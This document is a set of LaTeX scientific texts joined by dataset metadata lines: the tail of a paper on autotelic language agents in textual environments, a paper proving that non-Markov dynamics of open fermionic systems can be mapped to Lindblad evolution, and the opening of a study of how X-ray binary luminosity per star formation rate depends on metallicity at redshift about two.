Agents trained in such environments will learn a form of language use, not by predicting the most likely sequence of words from a large-scale dataset \cite{Radford2018ImprovingLU, brown2020language} but by learning to use it pragmatically to effect changes in the environment. Of course, the limits of the autotelic agent's world will mean the limits of its language; an interesting development is to build agents that explore textual environments to refine external linguistic knowledge provided by a pretrained language model. This external knowledge repository can be seen as culturally-accumulated common sense, a perspective that is related to so-called Vygotskian AI \cite{colas:tel-03337625} in which a developmental agent learns by interacting with an external social partner that imparts outside language knowledge and organizes the world so as to facilitate the autotelic agent's exploration.
\vspace{5pt}
To conclude, textual environments are ideal testbeds for autotelic language-conditioned agents, and conversely such agents can bring progress on text world benchmarks. There is also promise in the interaction between exploratory agents and large language models encoding exterior linguistic knowledge. Preliminary steps have been taken in this direction \cite{madotto2020exploration} but the full breadth of drivers of exploration we identify has yet to be studied. We hope to foster discussion, define concrete implementations and identify challenges by bringing together the developmental perspective on AI and the textual environment community.
| 2024-02-18T23:40:03.145Z | 2022-07-12T02:02:23.000Z | algebraic_stack_train_0000 | 1,182 | 2,658 |
|
proofpile-arXiv_065-6021 | \section{Introduction}
Open nonequilibirum systems are at the forefront of experimental and theoretical research due to rich and complex physics
they provide access to as well as due to applicational prospects of building nanoscale devices for quantum based technologies
and computations~\cite{jiang_repetitive_2009,khasminskaya_fully_2016,gaita-arino_molecular_2019}.
Especially intriguing in term of both fundamental science and potential applications are effects of strong correlations.
A number of impurity solvers capable of treating strongly correlated systems coupled to continuum of
baths degrees of freedom were developed. Among them are numerical renormalization group in the basis of scattering
states~\cite{anders_steady-state_2008,schmitt_comparison_2010},
flow equations~\cite{wegner_flow-equations_1994,kehrein_flow_2006},
time-dependent density matrix renormalization group~\cite{schollwock_density-matrix_2005,schollwock_density-matrix_2011},
multilayer multiconfiguration time-dependent Hartree (ML-MCTDH)~\cite{wang_numerically_2009,wang_multilayer_2018},
and continuous time quantum Monte Carlo~\cite{cohen_taming_2015,antipov_currents_2017,ridley_numerically_2018}
approaches. These numerically exact techniques are very demanding and so far are mostly applicable to simple models only.
At the same time, accurate numerically inexpensive impurity solvers are in great demand both as standalone techniques
to be applied in simulation of, e.g., nanoscale junctions and as a part of divide-and-conquer schemes such as, e.g,
dynamical mean-field theory (DMFT)~\cite{anisimov_electronic_2010,aoki_nonequilibrium_2014}.
In this respect ability to map complicated non-Markovian dynamics of a system onto
much simpler Markov consideration is an important step towards creating new computational techniques
applicable in realistic simulations. In particular, such mapping was used in auxiliary master equation approach (AMEA)~\cite{arrigoni_nonequilibrium_2013,dorda_auxiliary_2014}
introducing numerically inexpensive and pretty accurate solver for the nonequilibrium DMFT.
Another example is recent formulation of the auxiliary dual-fermion method~\cite{chen_auxiliary_2019}.
While the mappings appear to be very useful and accurate, only semi-quantitative arguments for possibility of the mapping
were presented with main supporting evidence being benchmarking vs. numerically exact computational techniques.
In particular, a justification for the mapping was argued in Refs.~\cite{schwarz_lindblad-driven_2016,dorda_optimized_2017,Arrigoni2018} based upon the singular coupling derivation of the Lindblad equation.
Still, the consideration is not rigorous.
Recently, a rigorous proof of non-Markov to Markov mapping for open Bose quantum systems was presented in the literature~\cite{tamascelli_nonperturbative_2018}.
It was shown that evolution of reduced density matrix in non-Markov system with unitary system-environment evolution can be
equivalently presented by Markov evolution of an extended system (system plus modes of environment)
under non-unitary (Lindblad-type) evolution. Here, we extend consideration of Ref.~\cite{tamascelli_nonperturbative_2018}
to fermionic open quantum systems and to multi-time correlation functions.
The structure of the paper is the following. After introducing physical and auxiliary models of an open quantum Fermi
system in Section~\ref{model} we discuss non-Markov to Markov mapping procedure
in Section~\ref{map}. Exact mathematical proofs are given in Appendices. Section~\ref{numres} presents numerical illustration of
the mapping for a simple generic model of a junction. We conclude in Section~\ref{conclude}.
\begin{figure}[b]
\centering\includegraphics[width=\linewidth]{fig1}
\caption{\label{fig1}
Sketch of an open fermionic system $S$. Shown are
(a) physical system coupled to $N$ baths and
(b) illustration for an auxiliary system with coupling to full (left) and empty (right) baths.
}
\end{figure}
\section{Models}\label{model}
We consider an open fermionic system $S$ coupled to an arbitrary number $N$ of external baths,
initially each at its own thermodynamic equilibrium, i.e. characterized by its own electrochemical potential and temperature
(see Fig.~\ref{fig1}a). The Hamiltonian of the model is
\begin{equation}
\label{Hphys}
\hat H^{phys}(t) = \hat H_S(t) + \sum_{B=1}^{N}\bigg( \hat H_{B} + \hat V_{SB} \bigg)
\end{equation}
Here $\hat H_S(t)$ and $\hat H_B$ ($K\in\{1,\ldots,N\}$) are Hamiltonians of the system and baths.
$\hat V_{SB}$ introduces coupling of the system to bath $B$.
While the Hamiltonian of the system is general and may be time-dependent, we follow the usual paradigm
by assuming bi-linear coupling in constructing fermionic junction models.
\begin{eqnarray}
\hat H_B &= \sum_{k\in B} \varepsilon_{B\, k}\hat c_{Bk}^\dagger\hat c_{Bk}
\\
\hat V_{SB} &= \sum_{k\in B} \sum_{i\in S}\bigg( V_{i,Bk} \hat d_i^\dagger\hat c_{Bk} + H.c. \bigg)
\end{eqnarray}
where $\hat d_i^\dagger$ ($\hat d_i$) and $\hat c_{Bk}^\dagger$ ($\hat c_{Bk}$) create (annihilate)
electron in level $i$ of the system $S$ and level $k$ of bath $B$.
In the model, dynamics of the system-plus-baths evolution is unitary. Below we call this model $phys$ (physical).
We note in passing that extension of the consideration to other types of system-baths couplings is straightforward,
as long as baths are quadratic in the Fermi operators.
The other configuration we'll consider is a model we shall call $aux$ (auxiliary; see Fig.~\ref{fig1}b). Here, the same system $S$
is coupled to a number of auxiliary modes $A$, which in their turn are coupled to two baths. There are two Fermi baths in the
configuration: one ($L$) is completely full ($\mu_L\to+\infty$), the other ($R$) is completely empty ($\mu_R\to-\infty$).
The Hamiltonian of the system is
\begin{equation}
\hat H^{aux}(t) = \hat H_{S}(t) + \hat V_{SA} + \hat H_A + \sum_{C=L,R}\bigg( \hat H_C + \hat V_{AC} \bigg)
\end{equation}
where $\hat H_S$ is the same as in (\ref{Hphys}), $\hat H_A$ represents set of modes
\begin{equation}
\hat H_A = \sum_{m_1,m_2\in A} H^{A}_{m_1m_2}\hat a_{m_1}^\dagger\hat a_{m_2}
\end{equation}
and $\hat V_{SA}$ their interaction with the system
\begin{equation}
\hat V_{SA} = \sum_{i\in S}\sum_{m\in A}\bigg( V^{SA}_{i m}\hat d_i^\dagger\hat a_m + H.c. \bigg)
\end{equation}
Here $\hat a_m^\dagger$ ($\hat a_m$) creates (annihilates) electron in the auxiliary mode $m$ in $A$.
$\hat H_C$ represents continuum of states in contact $C$
\begin{equation}
\hat H_C = \sum_{k\in C}\varepsilon_{Ck} \hat c_{Ck}^\dagger\hat c_{Ck}
\end{equation}
with constant density of states
\begin{equation}
N_C(E) \equiv \sum_{k\in C} \delta(E-\varepsilon_{Ck}) = const
\end{equation}
and $\hat V_{AC}$ couples auxiliary modes $A$ to bath $C$ ($L$ or $R$)
\begin{equation}
\hat V_{AC} = \sum_{k\in C} \sum_{m\in A}\bigg( t^C_m\hat a^\dagger_m \hat c_{Ck} + H.c. \bigg)
\end{equation}
Dynamics of the whole configuration is unitary.
In the next section we show that the reduced time evolution of $S$ in models $phys$ and $aux$ is the same
(subject to certain conditions)
and that the reduced dynamics of $S+A$ in model $aux$ satisfies an appropriate Lindblad Markov evolution.
This establishes procedure for Markov non-unitary Lindblad-type treatment of $S+A$ in $aux$
exactly representing unitary non-Markov dynamics of $S$ in $phys$ by tracing out $A$ degrees of freedom.
\section{Non-Markov to Markov mapping}\label{map}
First, we are going to prove that with an appropriate choice of parameters of $aux$ the dynamics of $S$
can be equivalently represented in the original model $phys$
and auxiliary model $aux$, under assumption that the dynamics of the whole system is unitary.
Because non-interacting baths are fully characterized by their two-time correlation functions,
equivalence of system-bath(s) hybridizations (i.e. correlation functions of the bath(s) dressed with system-bath(s) interactions)
for the two models indicates equivalence of the reduced system dynamics in the two cases.
For example, hybridization function is the only information about baths in numerically exact
simulations of strongly correlated systems~\cite{antipov_currents_2017}. Nonequilibrium character of the system
requires fitting two projections of the hybridization function (also called self-energy in the literature). In particular, these may be
retarded and Keldysh projections. Let $\Sigma_B^r(E)$ and $\Sigma_B^K(E)$ are matrices
introducing the corresponding hybridization functions
for bath $\alpha$ of the physical problem (Fig.~\ref{fig1}a).
\begin{eqnarray}
\big(\Sigma_B^r(E)\big)_{ij} &= \sum_{k\in B} V_{i,Bk}\, g^r_{Bk}(E)\, V_{Bk,j}
\\
\big(\Sigma_B^K(E)\big)_{ij}&= \sum_{k\in B} V_{i,Bk}\, g^K_{Bk}(E)\, V_{Bk,j}
\end{eqnarray}
where $g^{r\, (K)}_{Bk}(E)$ are the Fourier transforms of retarded (Keldysh) projections of the free
electron Green's function $g_{Bk}(\tau,\tau')=-i\langle T_c\,\hat c_{Bk}(\tau)\,\hat c_{Bk}^\dagger(\tau')\rangle$.
Then total hybridization functions for the system
\begin{eqnarray}
\Sigma^r(E) &= \sum_{B=1}^{N} \Sigma_B^r(E)
\\
\Sigma^K(E) &= 2\, i\sum_{B=1}^{N} \bigg(1-2f_B(E)\bigg)\mbox{Im}\,\Sigma^r_B(E)
\end{eqnarray}
should be identical with the corresponding hybridization functions, $\tilde\Sigma^r(E)$ and $\tilde\Sigma^K(E)$,
of $S$ in the auxiliary model (Fig.~\ref{fig1}b). The latter have contribution from full ($L$) and empty ($R$) baths,
and from auxiliary modes ($A$)
\begin{eqnarray}
\tilde\Sigma^r(E) &= \tilde\Sigma^r_L(E) + \tilde\Sigma^r_R(E)
\\
\tilde\Sigma^K(E) &= 2\,i\,\mbox{Im}\bigg(\tilde\Sigma^r_R(E)-\tilde\Sigma^r_L(E)\bigg)
\end{eqnarray}
where we assume modes $A$ initially in stationary state.
Requirement of equivalence can be expressed as
\begin{eqnarray}
\mbox{Im}\,\tilde\Sigma^r_L(E) &= \frac{2\, i\,\mbox{Im}\Sigma^r(E)+\Sigma^K(E)}{4\,i}
\\
\mbox{Im}\,\tilde\Sigma^r_R(E) &= \frac{2\, i\,\mbox{Im}\Sigma^r(E)-\Sigma^K(E)}{4\,i}
\end{eqnarray}
Thus, the problem reduces to fitting known functions in the right side of the expression with multiple contributions
from auxiliary modes to the hybridization functions in the left side.
In principle, this fitting can be done in many different ways~\cite{dorda_optimized_2017}.
For example, possibility of exact fitting of an arbitrary function with
set of Lorentzians was discussed in Ref.~\cite{imamoglu_stochastic_1994}.
In auxiliary systems such fitting corresponds to
a construction where each auxiliary mode is coupled to its own bath.
Note that in practical simulations accuracy of the results can be improved either by increasing number of auxiliary modes,
as is implemented in, e.g, AMEA~\cite{dorda_auxiliary_2015}, or by employing diagrammatic expansion related to the difference
between true and fitted hybridization functions,
as is realized in, e.g., dual fermion approach~\cite{jung_dual-fermion_2012}, or both.
Now, when equivalence of reduced system ($S$) dynamics in $phys$ and $aux$ is established, we turn to
consideration of evolution of the $aux$ model. We will show that reduced $S+A$ dynamics derived from unitary evolution
of the $aux$ model can be exactly represented by non-unitary Lindblad-type evolution.
Following Ref.~\cite{tamascelli_nonperturbative_2018} we consider reduced density operator of $S+A$ in $aux$,
$\hat \rho_{SA}$, which is defined by integrating out baths degrees of freedom of the total density operator
$\hat\rho^{aux}(t)$
\begin{equation}
\hat\rho_{SA}(t)\equiv \mbox{Tr}_{LR}\bigg[\hat\rho^{aux}(t)\bigg]
\end{equation}
The latter follows unitary evolution with initial condition being $S+A$ decoupled from the baths
\begin{equation}
\label{rhoaux0}
\hat\rho^{aux}(0) = \hat\rho_L\otimes\hat\rho_{SA}(0)\otimes\hat\rho_R
\end{equation}
where $\hat\rho_L=\vert full\rangle\langle full\vert$ and $\hat\rho_R=\vert empty\rangle\langle empty\vert$.
In Appendix~\ref{appA} we prove that $\hat\rho_{SA}(t)$ satisfies Markov Lindblad-type equation of motion
\begin{align}
\label{rho_EOM}
&\frac{d}{dt} \hat\rho_{SA}(t) = -i\bigg[\hat H_{SA}(t),\hat \rho_{SA}(t)\bigg] + \sum_{m_1,m_2\in A}\bigg[
\nonumber \\ & \quad
\Gamma^R_{m_1m_2}\bigg(\hat a_{m_2}\hat\rho_{SA}(t)\hat a_{m_1}^\dagger-\frac{1}{2}\left\{\hat\rho_{SA}(t),\hat a_{m_1}^\dagger\hat a_{m_2}\right\}\bigg)
\\ &
+\Gamma^L_{m_1m_2}\bigg(\hat a_{m_1}^\dagger\hat\rho_{SA}(t)\hat a_{m_2}-\frac{1}{2}\left\{\hat\rho_{SA}(t),\hat a_{m_2}\hat a_{m_1}^\dagger\right\}\bigg)
\bigg]
\nonumber \\
&\equiv \mathcal{L}_{SA}(t) \vert\rho_{SA}(t)\rangle\rangle
\nonumber
\end{align}
where
\begin{equation}
\hat H_{SA}(t)\equiv \hat H_S(t)+\hat V_{SA}+\hat H_A,
\end{equation}
$\mathcal{L}_{SA}$ is the Liouvillian superoperator defined on the $S+A$ subspace of the $aux$ model and
\begin{equation}
\label{Gammadef}
\Gamma^C_{m_1m_2}\equiv 2\pi t^C_{m_1} (t_{m_2}^{C})^{*} N_C \qquad (C=L,R)
\end{equation}
is the dissipation matrix due to coupling to contact $C$.
\begin{figure}[htbp]
\centering\includegraphics[width=0.8\linewidth]{fig2}
\caption{\label{fig2}
The Keldysh contour.
}
\end{figure}
Next we turn to multi-time correlation functions of operators in the $S+A$ subspace of the $aux$ model.
Following Ref.~\cite{tamascelli_nonperturbative_2018} we start consideration from two-time correlation function on real time axis.
For arbitrary operators $\hat O_1$ and $\hat O_2$ in $S+A$ we define two-time ($t_1\geq t_2\geq 0$)
correlation function as
\begin{align}
\label{corr2rt}
& \langle\hat O_1(t_1)\hat O_2(t_2)\rangle \equiv
\\ &
\mbox{Tr}\bigg[\hat O_1\,\hat U^{aux}(t_1,t_2)\,\hat O_2\,\hat U^{aux}(t_2,0)\,\hat \rho^{aux}(0)\,\hat U^{aux\,\dagger}(t_1,0)\bigg]
\nonumber
\end{align}
Here $\hat U^{aux}$ is the evolution operator in the $aux$ system
\begin{equation}
\label{Uaux}
\hat U^{aux}(t,t') \equiv T \exp\bigg[-i\int_{t'}^{t}ds\, \hat H^{aux}(s)\bigg]
\end{equation}
and $T$ is the time-ordering operator.
In \ref{appB} we show that (\ref{corr2rt}) can be equivalently obtained from reduced Linblad-type evolution in
the $S+A$ subspace
\begin{align}
\label{corr2rt_EOM}
&\langle\hat O_1(t_1)\hat O_2(t_2)\rangle =
\\ &\quad
\langle\langle I\vert \mathcal{O}^{-}_1\,\mathcal{U}_{SA}(t_1,t_2)\,
\mathcal{O}^{-}_{2}\,\mathcal{U}_{SA}(t_2,0)\,\vert\rho_{SA}(0)\rangle\rangle
\nonumber
\end{align}
Here $\langle\langle I\vert$ is Liouville space bra representation of the Hilbert space identity operator,
$\mathcal{O}_i$ is the Liouville space superoperator corresponding to the Hilbert space operator $\hat O_i$
(see Fig.~\ref{fig2})
\begin{equation}
\label{superop}
\mathcal{O}_i \vert \rho\rangle\rangle = \left\{
\begin{array}{cc}
\mathcal{O}_i^{-} \vert \rho\rangle\rangle \equiv \hat O_i\,\hat\rho & \mbox{forward branch}
\\
\mathcal{O}_i^{+} \vert \rho\rangle\rangle \equiv \hat\rho\,\hat O_i & \mbox{backward branch}
\end{array}
\right.
\end{equation}
and $\mathcal{U}_{SA}$ is the Liouville space evolution superoperator
\begin{equation}
\label{ULiouv}
\mathcal{U}_{SA}(t,t') \equiv T \exp\bigg[\int_{t'}^t ds\,\mathcal{L}_{SA}(s)\bigg]
\end{equation}
Finally, we extend consideration to multi-time correlation functions of arbitrary operators $\hat O_i$ ($i\in\{1,\ldots,N\}$)
defined on the Keldysh contour (see Fig.~\ref{fig2}) as
\begin{align}
\label{corrN}
& \langle T_c\, \hat O_1(\tau_1)\,\hat O_2(\tau_2)\ldots\hat O_N(\tau_N)\rangle
\equiv
\\ &\qquad
\mbox{Tr}\bigg[T_c\,\hat O_1\,\hat O_2\ldots\hat O_N\,\hat U_c\,\hat\rho^{aux}(0)\bigg]
\nonumber
\end{align}
where $\tau_i$ are the contour variables, $T_c$ is the contour ordering operator, and
\begin{equation}
\hat U_c = T_c \exp\bigg[-i\int_c d\tau\,\hat H^{aux}(\tau)\bigg]
\end{equation}
is the contour evolution operator.
Note subscripts of operators $O_i$ in the right side of (\ref{corrN}) indicate both type of the operator and its position on the contour.
In \ref{appC} we prove that multi-time correlation functions (\ref{corrN}) can be evaluated solely from
Markov Lindblad-type evolution in $S+A$ subspace of the $aux$ model
\begin{align}
\label{corrN_EOM}
&\langle T_c\, \hat O_1(\tau_1)\,\hat O_2(\tau_2)\ldots\hat O_N(\tau_N)\rangle
=
\\ &\quad (-1)^P
\langle\langle I\vert \mathcal{O}_{\theta_1}\,\mathcal{U}_{SA}(t_{\theta_1},t_{\theta_2})\, \mathcal{O}_{\theta_2}\,
\mathcal{U}_{SA}(t_{\theta_2},t_{\theta_3})\ldots
\nonumber \\ &\qquad\qquad\qquad\qquad\quad\ldots
\mathcal{O}_{\theta_N}\mathcal{U}_{SA}(t_{\theta_N},0)
\vert \rho_{SA}(0)\rangle\rangle
\nonumber
\end{align}
Here $P$ is number of Fermi interchanges in the permutation of operators $\hat O_i$ by $T_c$,
$\theta_i$ are indices of operators $\hat O_i$ rearranged is such a way that
$t_{\theta_1}>t_{\theta_2}>\ldots >t_{\theta_N}$
($t_{\theta_i}$ is real time corresponding to contour variable $\tau_{\theta_i}$),
$\mathcal{O}_{\theta_i}$ are the superoperators defined in (\ref{superop}),
and $\mathcal{U}_{SA}$ is the Liouville space evolution superoperator defined in (\ref{ULiouv}).
Equivalence of $S$ dynamics derived from unitary evolution of models $phys$ and $aux$
together with (\ref{rho_EOM}) and (\ref{corrN_EOM}) completes proof of possibility of Markov treatment for
non-Markovian dynamics in open quantum Fermi systems.
\section{Numerical illustration}\label{numres}
\begin{figure}[htbp]
\centering\includegraphics[width=\linewidth]{fig3}
\caption{\label{fig3}
Original Anderson impurity (a) and corresponding auxiliary (b) models.
}
\end{figure}
\begin{figure}[htbp]
\centering\includegraphics[width=0.6\linewidth]{fig4}
\caption{\label{fig4}
Unitary (filled circles, red) and Lindblad-type (solid line, blue) evolution in auxiliary model of Fig.~\ref{fig3}b
after connecting initially empty central site to filled $L$ and empty $R$ baths.
Shown are population of the level (a) and left (b) and right (c) currents.
See text for parameters.
}
\end{figure}
\iffalse
\begin{figure}[htbp]
\centering\includegraphics[width=0.6\linewidth]{fig5}
\caption{\label{fig5}
Unitary (filled circles, red) and Lindblad-type (solid line, blue) evolution in auxiliary model of Fig.~\ref{fig3}b
after connecting initially empty central site to filled $L$ and empty $R$ baths.
Shown are
(a) greater $\langle \hat d_\sigma(t_2)\hat d_\sigma^\dagger(t_1)\rangle$ and
(b) and lesser $\langle \hat d_\sigma^\dagger(t_2)\hat d_\sigma(t_1)\rangle$
projections of the Green's function. In the simulations $t_1$ is fixed at $0.1\, t_0$.
See text for parameters.
}
\end{figure}
\fi
Here we present numerical simulation illustrating equivalence of original unitary and
Lindblad-type Markov treatment for the open quantum Fermi system.
We consider Anderson model (Fig.~\ref{fig3}a)
\begin{align}
\hat H &=\sum_{\sigma\in\{\uparrow,\downarrow\}}\varepsilon_0\hat d_\sigma^\dagger\hat d_\sigma + U \hat n_\uparrow\hat n_\downarrow
\\ &
+\sum_{k\in L,R}\sum_{\sigma\in\{\uparrow,\downarrow\}}\bigg(\varepsilon_k\hat c_{k\sigma}^\dagger\hat c_{k\sigma}
+ V_k \hat d^\dagger_{\sigma}\hat c_{k\sigma} + V_k^{*} \hat c_{k\sigma}^\dagger \hat d_\sigma\bigg)
\nonumber
\end{align}
where $\hat n_\sigma=\hat d_\sigma^\dagger\hat d_\sigma$.
We calculate the system evolution after connecting initially empty site to baths at time $t=0$.
Parameters of the simulations are (numbers are in arbitrary units of energy $E_0$):
$\varepsilon_0=0$ and $U=1$. We assume
\begin{equation}
\Gamma_K(E)=\gamma_K\frac{t_K^2}{(E-\varepsilon_0)^2+(\gamma_K/2)^2}
\end{equation}
where $\Gamma_K(E)\equiv 2\pi\sum_{k\in K}\vert V_k\vert^2\delta(E-\varepsilon_k)$
is the electron escape rate into contact $K$, $\gamma_L=\gamma_R=0.2$, and $t_L=t_R=1$.
For simplicity, we consider high bias, so that auxiliary model with only two sites (Fig.~\ref{fig3}b)
is sufficient to reproduce dynamics in the physical system.
In the auxiliary model we compare unitary evolution calculated within numerically exact
td-DMRG~\cite{schollwock_density-matrix_2005,schollwock_density-matrix_2011,bauer_alps_2011,dolfi_matrix_2014} with Lindblad QME results. Time is shown in units of $t_0=\hbar/E_0$, currents use $I_0=E_0/\hbar$,
and $\hbar$ is assumed to be $1$.
Figure~\ref{fig4} shows level population, $n_0=\langle\hat n_\sigma\rangle$, as well as left, $I_L$, and right, $I_R$, currents
in the system after quench.
Close correspondence between the two numerical results is an illustration
for exact analytical derivations presented in Section~\ref{map}.
\section{Conclusions}\label{conclude}
We consider open quantum Fermi system $S$ coupled to a number of external Fermi baths each at its own equilibrium
(each bath has its own electrochemical potential $\mu_i$ and temperature $T_i$).
Evolution of the model (system plus baths) is unitary.
We show that reduced dynamics of the system $S$ in the original unitary non-Markov model can be
exactly reproduced by Markov non-unitary Lindblad-type evolution of an auxiliary system,
which consists of the system $S$ coupled to a number of auxiliary modes $A$ which in turn are coupled
to two Fermi baths $L$ and $R$: one full ($\mu_L\to+\infty$) and one empty ($\mu_R\to-\infty$).
The proof is performed in two steps: first we show that reduced $S$ dynamics in the physical model is
equivalent to reduced dynamics of $S$ in the auxiliary model, when $A$ degrees of freedom and the two baths are
traced out; second, we show that reduced dynamics of $S$+$A$ in the auxiliary model with unitary evolution of the model
can be exactly reproduced by the Lindblad-type Markov evolution of $S$+$A$.
The correspondence is shown to hold for reduced density matrix and for multi-time correlation functions defined
on the Keldysh contour. Our study is extension of recent work about Bose systems~\cite{tamascelli_nonperturbative_2018}
to open Fermi systems and beyond only reduced density matrix consideration.
Establishing possibility of exact mapping of reduced unitary non-Markov dynamics to much simpler
non-unitary Markov Lindbald-type treatment sets firm basis for auxiliary quantum master equations (QME) methods
employed in, e.g, AMEA~\cite{arrigoni_nonequilibrium_2013} or aux-DF~\cite{chen_auxiliary_2019} approaches.
We note that in practical implementations improving quality of mapping can be based on increasing number of
$A$ modes, as is done in advanced AMEA implementations~\cite{dorda_auxiliary_2015}, or by utilization of expansion in
discrepancy between physical and auxiliary hybridization functions, as is done in the dual fermion
formulation~\cite{jung_dual-fermion_2012},
or both. Scaling performance of the two approaches to mapping quality enhancement is a goal for future research.
\begin{acknowledgments}
We thank Max Sorantin for useful discussions.
This material is based upon work supported by the National Science Foundation under grant CHE-1565939.
\end{acknowledgments}
| 2024-02-18T23:40:03.932Z | 2019-09-20T02:01:35.000Z | algebraic_stack_train_0000 | 1,224 | 3,642 |
|
proofpile-arXiv_065-6077 | \section{Introduction}
\label{sec:intro}
Studies of nearby star-forming galaxies have established that the integrated X-ray luminosity ($L_{\mathrm{X}}$) of high-mass X-ray binaries (HMXBs) in a galaxy is linearly correlated with its star formation rate (SFR; \citealt{ranalli03}; \citealt{grimm03}; \citealt{persic04}; \citealt{gilfanov04a}; \citealt{lehmer10}; \citealt{mineo12}). This $L_{\mathrm{X}}$-SFR correlation exists because of the young ages and short lifetimes of HMXBs, which consist of a black hole (BH) or neutron star (NS) accreting material from a high-mass ($M>8M_{\odot}$) stellar companion. It is estimated that HMXBs form just $\sim$4-40 Myr after a starburst and remain X-ray active only for $\sim10$ Myr (\citealt{iben95}; \citealt{bodaghee12c}; \citealt{antoniou16}). \par
Several studies have found that the normalization of the $L_{\mathrm{X}}$-SFR relation evolves with redshift ($z$), increasing by about 0.5 dex in $L_{\mathrm{X}}$ at fixed SFR between $z=0-2$ (\citealt{basu13a}; \citealt{lehmer16}; \citealt{aird17}). On the contrary, \citet{cowie12} found no redshift evolution of $L_{\mathrm{X}}$/SFR. However, \citet{basu13a} argued that this apparent lack of evolution results from the fact that \citet{cowie12} did not correct their SFR proxy, UV luminosity, for dust extinction, and \citet{kaaret14} suggested that the anomalous \citet{cowie12} results may be attributed to their adoption of a spectral model that was not steep enough at hard X-ray energies. It has been suggested that the redshift evolution of $L_{\mathrm{X}}$/SFR is driven by the metallicity ($Z$) dependence of HMXB populations and the fact that, on average, HMXBs at higher redshift have lower stellar metallicities. \par
Over the past decade, binary population synthesis studies have investigated the effects of metallicity on HMXB evolution. The winds of main-sequence high-mass stars are primarily driven by radiation pressure on atomic lines. Since high-mass stars primarily emit in the UV, and metals have far more UV atomic lines than H or He, the strength of their stellar winds is determined by their stellar metallicity.
As a result, higher $Z$ stars experience higher mass loss rates, losing more mass during the course of their lifetimes than lower $Z$ stars. Therefore, the compact objects in low $Z$ binaries are expected to be more massive than ones produced by stars of similar initial mass in higher $Z$ binaries (\citealt{belczynski04}; \citealt{dray06}; \citealt{fragos13a}). Another effect of the weaker winds of lower $Z$ stars is that less angular momentum is lost from the binary, resulting in a larger fraction of HMXBs in which accretion occurs via Roche lobe overflow \citep{linden10}. Thus, lower $Z$ HMXB populations are expected to contain larger fractions of Roche lobe overflow BH HMXBs, which are typically more luminous than wind-fed NS HMXBs. There is a general consensus that larger populations of luminous HMXBs exist in lower $Z$ environments, although the strength of this trend varies between studies. Studies predict that $L_{\mathrm{X}}$/SFR may increase by factor of 2 to 10 between $Z_{\odot}$ and 0.1 $Z_{\odot}$ (\citealt{linden10}; \citealt{fragos13b}). \par
In addition to informing models of binary stellar evolution, constraining the $Z$ dependence of HMXB populations can yield insight into possible formation channels for the heavy BH binaries discovered by gravitational wave observatories \citep{abbott16}. Such BH binaries are thought to have evolved either from HMXBs in a low $Z$ environment \citep{belczynski16} or through dynamical formation in dense stellar clusters \citep{rodriguez16}. Constraining the $Z$ dependence of HMXBs is also critical for understanding their contribution to the X-ray heating of the intergalactic medium during the epoch of reionization when the Universe was extremely metal-poor (\citealt{mirabel11}; \citealt{madau17}), and informing models of the 21 cm power spectrum (e.g. \citealt{parsons14}). Furthermore, these constraints are important to accurately estimate the HMXB contamination to X-ray based searches for intermediate mass black holes (\citealt{mezcua17}). Finally, properly calibrating for the $Z$ dependence of HMXBs can improve the reliability of $L_{\mathrm{X}}$ as a SFR indicator \citep{brorby16}.
\par
There is increasing observational evidence that a larger number of HMXBs, especially ultra-luminous X-ray sources (ULXs, $L_X\gtrsim10^{39}$ erg s$^{-1}$), per unit SFR exist in nearby low $Z$ galaxies (\citealt{mapelli11}; \citealt{kaaret11}; \citealt{prestwich13}; \citealt{basu13b}; \citealt{brorby14}; \citealt{douna15}). The enhanced number of bright HMXBs cannot be accounted for by stochasticity and suggests that at very low metallicities (12+log(O/H) $< 8.0$), the production rate of HMXBs is approximately 10 times higher than in solar metallicity (12+log(O/H)=8.69) galaxies (\citealt{brorby14}; \citealt{douna15}). Using a compilation of measurements for 49 galaxies from the literature spanning $7.0<$12+log(O/H)$<9.0$, \citet{brorby16} (hereafter \citetalias{brorby16}) parametrize the $L_X$-SFR-$Z$ correlation as:
\begin{equation}
\mathrm{log}\left(\frac{L_X/SFR}{\mathrm{erg\hspace{4pt} s^{-1}/(M_{\odot}\mathrm{\hspace{4pt}yr^{-1})}}}\right) = b\times(12+\mathrm{log(O/H)}-8.69)+c
\end{equation}
where the best-fitting parameters are $b=-0.59\pm0.13$ and $c=39.49\pm0.09$. While this relation may be biased due to the mixture of sample selections for different galaxy samples taken from the literature, it provides the first observational benchmark of the $L_{\mathrm{X}}$-SFR-$Z$ relation at $z=0$. However, it has not yet been shown that the $Z$ dependence of HMXBs is the underlying cause of the observed redshift evolution of $L_{\mathrm{X}}$/SFR. \par
We present the results of an X-ray stacking study of $z\sim2$ star-forming galaxies drawn from the MOSFIRE Deep Evolution Field (MOSDEF) survey whose goal is to test this hypothesis observationally. The MOSDEF survey obtained rest-frame optical spectra for roughly 1500 galaxies at $1.4<z<3.8$ in CANDELS fields, which have been observed to deep limits with the \textit{Chandra X-ray Observatory}; the combination of a large sample of high-redshift galaxies with robust $Z$ measurements and deep X-ray data is what makes the study of the connection between the redshift evolution and $Z$ dependence of HMXBs possible for the first time. In \S \ref{sec:mosdef}, we describe the MOSDEF survey and the measurement of galaxy properties. \S\ref{sec:chandra} describes the \textit{Chandra} X-ray data and catalogs used in this study. Sample selection and our X-ray stacking analysis are detailed in \S\ref{sec:sample} and \S\ref{sec:stacking}, respectively. In \S\ref{sec:results}, we discuss our measurement of the $Z$ dependence of $L_X$/SFR at $z\sim2$ and compare it to the local $L_X$-SFR-$Z$ relation and theoretical models. Our conclusions are presented in \S\ref{sec:conclusions}. Throughout this work, we assume a cosmology with $\Omega_m = 0.3$, $\Omega_{\Lambda} = 0.7$, and $h = 0.7$ and adopt the solar abundances from \citet{asplund09} ($Z_{\odot}=0.0142$, 12+log(O/H)$_{\odot}=8.69$).
\section{The MOSDEF Survey}
\label{sec:mosdef}
Our $z\sim2$ galaxy sample is selected from the MOSDEF survey \citep{kriek15}. This survey obtained moderate-resolution (R = 3000--3650) rest-frame optical spectra for $\sim1500$ $H$-band selected galaxies using the MOSFIRE multi-object near-IR spectrograph \citep{mclean12} on the 10-meter Keck I telescope.
MOSDEF targets are located in the CANDELS fields, where extensive multi-wavelength coverage is available (\citealt{grogin11}; \citealt{koekemoer11}). Possible MOSDEF target objects were selected from the 3D-HST photometric and spectroscopic catalogs (\citealt{skelton14}; \citealt{momcheva16}) to magnitude limits of $H= 24.0$, $H = 24.5$, and $H = 25.0$ for the low (1.37 $\leq z \leq$ 1.70), middle (2.09 $\leq z \leq$ 2.61), and high (2.95 $\leq z \leq$ 3.80) redshift intervals, respectively. These magnitude limits roughly correspond to a lower mass limit of $\sim10^9M_{\odot}$. \par
